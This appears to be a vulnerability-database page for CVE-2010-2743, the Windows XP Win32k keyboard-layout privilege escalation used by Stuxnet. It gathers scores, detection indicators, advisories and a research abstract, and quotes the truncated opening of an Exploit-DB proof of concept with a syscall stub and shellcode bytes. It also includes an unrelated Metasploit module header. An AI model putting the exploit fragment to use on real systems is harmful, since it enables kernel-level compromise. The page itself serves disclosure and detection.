CVE-2010-2743
published 2011-01-20CVE-2010-2743: The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from…
PriorityP270high7.2CVSS 2.0
AVLACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
14.85%
96.3th percentile
The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
mov eax, 000011c6h; mov edx, 7ffe0300h; call dword ptr [edx]; retn 1Ch
bytes↗
\x90\x90\x90\x90\xC2\x0C\x00\x90\x90
- →Monitor calls to NtUserLoadKeyboardLayoutEx from user-mode processes with a crafted/malformed DLL handle and suspicious KLID values (e.g., 0x666), which is the exploitation vector for this CVE. ↗
- →Detect creation of files with the extension .boom in the TEMP directory, particularly named p0wns.boom, as this is the malformed keyboard layout file dropped by the exploit. ↗
- →Detect VirtualAlloc calls targeting the fixed base address 0x60630000 with PAGE_EXECUTE_READWRITE permissions, used to stage the Ring 0 shellcode payload. ↗
- →The exploit uses SendInput with a null virtual key (wVk=0x0) after loading the malformed keyboard layout to trigger shellcode execution; monitor for this pattern following suspicious keyboard layout loads. ↗
- ·The exploit targets Windows XP SP3 specifically; the NtUserLoadKeyboardLayoutEx syscall number (0x11c6) is hardcoded and version-specific, so the same binary will not work on other Windows versions without modification. ↗
- ·CVE-2010-2743 may be a duplicate of CVE-2010-3888 or CVE-2010-3889; detection rules should consider covering all three CVEs to avoid gaps. ↗
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-ggjq-qv33-pv47: The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layout
ghsa_unreviewed·2022-05-14·CVSS 7.2
CVE-2010-2743 [HIGH] GHSA-ggjq-qv33-pv47: The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layout
The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889.
VulnCheck
Microsoft Windows Win32k Keyboard Layout Privilege Escalation
vulncheck·2010·CVSS 7.2
CVE-2010-2743 [HIGH] Microsoft Windows Win32k Keyboard Layout Privilege Escalation
Microsoft Windows Win32k Keyboard Layout Privilege Escalation
The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf
No detection rules found.
Exploit-DB
Microsoft Win32k - Keyboard Layout (MS10-073)
exploitdb·2011-01-13
CVE-2010-2743 Microsoft Win32k - Keyboard Layout (MS10-073)
Microsoft Win32k - Keyboard Layout (MS10-073)
---
// My koala is staring at you CºgºD
// Source: http://reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1
#include
#include
#include
#define MAGIC_OFFSET 0x6261
#define InitializeUnicodeStr(p,s) { \
(p)->Length= wcslen(s)*2; \
(p)->MaximumLength = wcslen(s)*2+2; \
(p)->Buffer = s; \
}
_declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx
(
IN HANDLE Handle,
IN DWORD offTable,
IN PUNICODE_STRING puszKeyboardName,
IN HKL hKL,
IN PUNICODE_STRING puszKLID,
IN DWORD dwKLID,
IN UINT Flags
)
{
__asm
{
mov eax, 000011c6h
mov edx, 7ffe0300h
call dword ptr [edx]
retn 1Ch
}
}
unsigned char shellcode[]="\x90\x90\x90\x90\xC2\x0C\x00\x90\x90";
unsigned char fakeDll[]="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
Exploit-DB
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
exploitdb·2010-07-03
CVE-2006-5745 Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
---
##
# $Id: ms06_071_xml_core.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Internet Explorer XML Core Services HTTP Request Handling',
'Description' => %q{
This module exploits a code execution vulnerability in Microsoft XML Core Services which
exists in the XMLHTTP ActiveX control. This module is the modifed version of
http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successful
Metasploit
Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation
metasploit
Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation
Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation
This module exploits the keyboard layout vulnerability exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.
arXiv
Securing The Kernel via Static Binary Rewriting and Program Shepherding
arxiv_fulltext·2011-05-10
Securing The Kernel via Static Binary Rewriting and Program Shepherding
## Abstract
Recent Microsoft security bulletins show that kernel vulnerabilities are becoming more and more important security threats. Despite the pretty extensive security mitigations many of the kernel vulnerabilities are still exploitable. Successful kernel exploitation typically grants the attacker maximum privilege level and results in total machine compromise.
To protect against kernel exploitation, we have developed a tool which statically rewrites the Microsoft Windows kernel as well as other kernel level modules. Such rewritten binary files allow us to monitor control flow transfers during operating system execution. At this point we are able to detect whether selected control transfer flow is valid or should be considered as an attack attempt.
Our solution is especially direc
Tenable
Microsoft Patch Tuesday Roundup - October 2010 - "Nightmare" Edition
blogs_tenable·2010-10-14
Microsoft Patch Tuesday Roundup - October 2010 - "Nightmare" Edition
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://www.us-cert.gov/cas/techalerts/TA10-285A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-073https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7514http://www.us-cert.gov/cas/techalerts/TA10-285A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-073https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7514
2011-01-20
Published
Exploited in the wild